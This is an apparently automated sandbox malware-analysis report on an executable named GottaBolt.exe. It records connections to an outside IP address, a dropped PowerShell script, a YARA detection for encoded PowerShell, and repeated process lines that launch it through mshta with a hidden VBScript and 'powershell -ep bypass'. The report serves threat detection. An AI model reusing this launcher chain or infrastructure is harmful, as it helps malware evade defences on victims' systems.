Source: powershell.exe, 00000004.00000002.2368919507.0000024E96770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4067770851.000001E8ED333000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: GottaBolt.exe	String found in binary or memory: https://www.ssl.com/repository0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.5:49744 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 mouse low level NULL

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F15682	0_2_00007FF848F15682
Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F148D6	0_2_00007FF848F148D6
Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F1E7DB	0_2_00007FF848F1E7DB
Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F201FA	0_2_00007FF848F201FA
Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F201D3	0_2_00007FF848F201D3
Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F1D329	0_2_00007FF848F1D329
Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F200CF	0_2_00007FF848F200CF
Source: C:\Users\user\Desktop\GottaBolt.exe	Code function: 0_2_00007FF848F200E7	0_2_00007FF848F200E7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF848F34B81	4_2_00007FF848F34B81
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848F49225	8_2_00007FF848F49225
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848F44176	8_2_00007FF848F44176
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848F44F22	8_2_00007FF848F44F22

Source: GottaBolt.exe

Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal72.evad.winEXE@16/17@1/2

Source: C:\Users\user\Desktop\GottaBolt.exe

File created: C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4n0wpwr.cc4.ps1

Jump to behavior

Source: GottaBolt.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: GottaBolt.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\GottaBolt.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GottaBolt.exe "C:\Users\user\Desktop\GottaBolt.exe"
Source: C:\Users\user\Desktop\GottaBolt.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GottaBolt.exe	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 """""" ,0:close")
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GottaBolt.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "

Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: netfxperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: esentprf.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: perfts.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: utildll.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: msdtcuiu.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: msdtcprx.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: msscntrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: perfdisk.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: wmiclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: perfnet.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: perfos.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: perfproc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: sysmain.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: rasctrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: tapiperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: perfctrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: usbperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: perfos.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\GottaBolt.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
